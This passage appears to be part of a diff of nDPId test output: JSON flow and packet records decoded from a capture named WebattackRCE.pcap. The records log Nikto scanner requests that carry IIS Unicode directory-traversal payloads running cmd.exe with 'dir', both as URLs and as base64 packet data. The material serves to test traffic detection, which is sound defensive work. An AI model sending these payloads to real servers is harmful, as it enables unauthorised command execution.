{"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277871,"pkt":"AAAAAAAAAAAAAAAACABFAADnEqJAAEAGKW1\/AAABfwAAAcdOH5CE7yudGG3JzIAYAED+2wAAAQEICp1m\/5edZv+XR0VUIC9paXNhZG1wd2QvLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMTkyKQ0KDQo="} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}} 
+01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1576420277873,"pkt":"AAAAAAAAAAAAAAAACABFAADuNNpAAEAGBy5\/AAABfwAAAcdQH5AuMg3l88MKY4AYAED+4gAAAQEICp1m\/5mdZv+ZR0VUIC9tc2FkYy8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MykNCg0K"} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}} 
+01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1576420277874,"pkt":"AAAAAAAAAAAAAAAACABFAADxWrBAAEAG4VR\/AAABfwAAAcdSH5DZZWOTGgkmxYAYAED+5QAAAQEICp1m\/5qdZv+aR0VUIC9wYnNlcnZlci8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}} 
+01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277875,"pkt":"AAAAAAAAAAAAAAAACABFAADs1jZAAEAGZdN\/AAABfwAAAcdUH5CUA+8Kq3ejjIAYAED+4AAAAQEICp1m\/5udZv+bR0VUIC9ycGMvLi4lYzAlYWYuLi8uLiVjMCVhZi4uL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}} 
+01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277877,"pkt":"AAAAAAAAAAAAAAAACABFAADl6fRAAEAGUhx\/AAABfwAAAcdWH5B7VdDQBDmQE4AYAED+2QAAAQEICp1m\/52dZv+dR0VUIC9zY3JpcHRzLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}} 
+01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277878,"pkt":"AAAAAAAAAAAAAAAACABFAADltn1AAEAGhZN\/AAABfwAAAcdYH5Dqro9H\/GjzZIAYAED+2QAAAQEICp1m\/56dZv+eR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}} 
+01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277880,"pkt":"AAAAAAAAAAAAAAAACABFAADqdQ5AAEAGxv1\/AAABfwAAAcdaH5DlNEwz0kNZnYAYAED+3gAAAQEICp1m\/6CdZv+gR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIrYzpcIiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}} 
+01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
